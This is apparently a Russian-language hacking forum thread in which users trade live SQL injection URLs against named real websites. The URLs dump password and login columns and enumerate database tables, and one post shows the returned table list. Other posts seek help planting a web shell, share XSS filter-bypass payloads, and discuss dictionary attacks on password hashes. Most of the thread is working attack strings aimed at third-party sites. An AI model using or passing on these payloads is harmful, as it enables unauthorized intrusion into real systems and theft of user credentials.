Там несколько таблиц users. (4+) Code: http://psp-club.ru/files/get/-114+union+select+passwd,2,3,4,5,6,7,8,9+FROM+exim.users/* Code: http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+fake_gaming.users/*
Люди,что хранится в .cpan/.lock ? Открыл,а там название сайта и вверху какие-то цифферки...проясните а( Ещё проблема: Скачал словарь с этого форума в .тхт формате,подрубаю в PasswordsPro,предварительно закинув его в папку Dictionaries.Затем проставил Атака по Словарям.Запустил,а мне выдало,что простая атака по словарям закончена(
помогите пожалуиста разобраться, какой тип данных в третьем поле? или на какой его изменить? пробывал to_char() to_number() итд ничего не подходит =,( простите за мою глупость, просто в первый раз встречаюсь с иньекцией в оракле
mailbrush имя бд, где находиться нужная таблица можешь узнать так: p.s. но лучше имя таблицы набирай в хэксе без кавычек, т.к. они могут фильтроваться, например table_name=0x7573657273
Отлично работает лимит. Прочти это: https://forum.antichat.ru/thread104591.html Или любой мануал по синтаксису
pinky007, thx! Ковычки не режет. Есть путь к корню полный, но шелл почему-то не льёт. Путь /home/vmail/domains/psp-club.ru/. Кто поможет - скиньте плиз в личку... Вам же этого сайта не надо, а мне очень нужно...
mailbrush там file_priv-n Я же дал линк на тему, там всё это описывается, неужели нет времени на чтение
пиши так: <ionmousemove=alert()>OVER оно само разделит) А теперь мой вопрос. Ошибка типа: запрос был вида: вобщем нульбайт фильтруется
Или кста те ещё так подойдёт: <bstyle="background:url(javascript:alert()); ">хек разделится как: <b style="background:url(javascript:alert()); ">хек или атк: <bstyle=background:url(javascript:alert())>xek
скажите пожалуйста,это скуль? если да,то как вывести инфу? Code: http://trud.dp.ua/vacancysearch.php?&short_view=1&pagenumber=http://wwwwwwww/&age=1&salary=1&branch=1&area=1&sex=1&education=1&days=1 паук написал что это реальный путь к серверу
http://trud.dp.ua/vacancyview.php?pagenumber=10&branch=-1'&area= Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/trudv2eq/trud-v2.dp.ua/vacancyview.php on line 24 вот.....
там нет выводимых полей, хотя инфу из бд вполне реально вывести подзапросами, тем более там пятая версия MySQL и там доступно information_schema вот - там пять таблиц с именем %user%
Если не уверен, зачем вводить людей в заблуждение? http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,concat_ws(0x3a,User(),Database(),Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18/* Завязывай писать ахинею. Если уж используешь подзапросы, то подумай, что ты вывел таким образом. Таблиц с именем %user% там 15, если уж быть точным http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,group_concat(concat_ws(0x3a,table_schema,table_name)),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18+from+information_schema.tables+where+table_name+LIKE+char(37,117,115,101,114,37)/* information_schema:USER_PRIVILEGES cacti:user_auth cacti:user_auth_perms cacti:user_auth_realm cacti:user_log,mysql:user printmedia:adm_users trainings:adm_users trainings:cron_user trn:adm_users trn:cron_user truddp:adm_users work-xeon:admin_user work-xeon:cron_user work-xeon:trud_reason_for_blocking_user work-xeon:trud_user
